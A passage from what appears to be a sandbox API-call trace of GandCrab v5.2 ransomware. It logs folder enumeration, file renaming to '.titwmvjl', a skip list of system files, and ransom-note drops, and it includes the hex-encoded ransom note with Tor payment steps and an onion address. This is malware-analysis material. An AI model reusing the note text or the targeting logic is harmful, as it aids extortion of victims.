7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0096.388] WriteFile (in: hFile=0x230, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f508, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f508*=0x2162, lpOverlapped=0x0) returned 1 [0096.389] CloseHandle (hObject=0x230) returned 1 [0096.389] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.389] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.389] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x29, wMilliseconds=0x2c3)) [0096.389] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.389] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0096.389] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0096.390] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\Favorites\\d2ca4a09d2ca4deb61a.lock") returned 51 [0096.390] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\default\\favorites\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x230 [0096.391] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.391] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.391] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\") returned 27 [0096.391] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Favorites\\*") returned="C:\\Users\\Default\\Favorites\\*" [0096.391] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\Favorites\\*", fInfoLevelId=0x1, lpFindFileData=0x259f524, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f524) returned 0x5036f8 [0096.391] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0096.391] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0096.392] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0096.392] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0096.392] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0096.392] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0096.393] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0096.393] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\Default\\Favorites\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\Default\\Favorites\\d2ca4a09d2ca4deb61a.lock" [0096.393] lstrlenW (lpString=".titwmvjl") returned 9 [0096.393] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\d2ca4a09d2ca4deb61a.lock") returned 51 [0096.393] VirtualAlloc (lpAddress=0x0, dwSize=0xa6, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.393] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Default\\Favorites\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 60 [0096.393] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\d2ca4a09d2ca4deb61a.lock") returned 51 [0096.393] lstrlenW (lpString=".lock") returned 5 [0096.393] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.393] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0096.393] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.393] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.394] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0096.394] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0096.394] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0096.394] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\Default\\Favorites\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\Default\\Favorites\\TITWMVJL-DECRYPT.txt" [0096.394] lstrlenW (lpString=".titwmvjl") returned 9 [0096.394] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\TITWMVJL-DECRYPT.txt") returned 47 [0096.394] VirtualAlloc (lpAddress=0x0, dwSize=0x9e, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.394] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Default\\Favorites\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 56 [0096.394] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\TITWMVJL-DECRYPT.txt") returned 47 [0096.394] lstrlenW (lpString=".txt") returned 4 [0096.394] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.394] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0096.394] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0096.394] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.394] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\TITWMVJL-DECRYPT.txt") returned 47 [0096.394] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\TITWMVJL-DECRYPT.txt") returned 47 [0096.394] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0096.395] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0096.395] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0096.395] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0096.395] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0096.395] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0096.395] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0096.395] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0096.395] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.395] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 0 [0096.395] FindClose (in: hFindFile=0x5036f8 | out: hFindFile=0x5036f8) returned 1 [0096.395] CloseHandle (hObject=0x230) returned 1 [0096.395] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0096.396] lstrcmpW (lpString1="Links", lpString2=".") returned 1 [0096.396] lstrcmpW (lpString1="Links", lpString2="..") returned 1 [0096.396] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Links" | out: lpString1="C:\\Users\\Default\\Links") returned="C:\\Users\\Default\\Links" [0096.396] lstrcatW (in: lpString1="C:\\Users\\Default\\Links", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Links\\") returned="C:\\Users\\Default\\Links\\" [0096.396] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0096.396] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.396] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0096.396] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.396] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0096.396] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.396] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0096.397] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.397] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0096.397] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.397] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.397] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\Links\\\\TITWMVJL-DECRYPT.txt") returned 44 [0096.397] CreateFileW (lpFileName="C:\\Users\\Default\\Links\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\default\\links\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0096.398] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\